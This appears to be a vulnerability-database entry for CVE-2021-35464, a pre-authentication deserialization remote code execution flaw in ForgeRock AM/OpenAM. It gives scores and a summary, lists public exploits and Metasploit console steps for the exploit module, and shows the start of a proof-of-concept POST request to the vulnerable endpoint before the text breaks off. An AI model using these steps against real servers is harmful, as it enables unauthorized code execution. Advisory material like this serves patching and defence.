CVE-2021-35464

Published: 22/07/2021 Updated: 02/08/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

ForgeRock AM server prior to 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. Exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists because of the use of the Sun ONE Application Framework (JATO), found in versions of Java 8 or earlier.

Vulnerable Products

forgerock am

forgerock openam

Exploits

This Metasploit module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful ...
ForgeRock Access Manager/OpenAM version 14.6.3 unauthenticated remote code execution exploit ...
This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable ...

Metasploit Modules

ForgeRock / OpenAM Jato Java Deserialization

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform, which is built on top of OpenAM and is thus susceptible to the same issue.

msf > use exploit/multi/http/cve_2021_35464_forgerock_openam
msf exploit(cve_2021_35464_forgerock_openam) > show targets
    ...targets...
msf exploit(cve_2021_35464_forgerock_openam) > set TARGET < target-id >
msf exploit(cve_2021_35464_forgerock_openam) > show options
    ...show and set options...
msf exploit(cve_2021_35464_forgerock_openam) > exploit

Github Repositories

openam-CVE-2021-35464: Tomcat command execution with echoed output

OpenAM CVE-2021-35464, Tomcat command execution with echoed output. The project is built on ysoserial and Java-Rce-Echo; it requires adding ysoserial.jar and jato-14.6.3.jar to its dependencies.

POST /OpenAM/ccversion/Version HTTP/1.1
Host: php.local:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Acc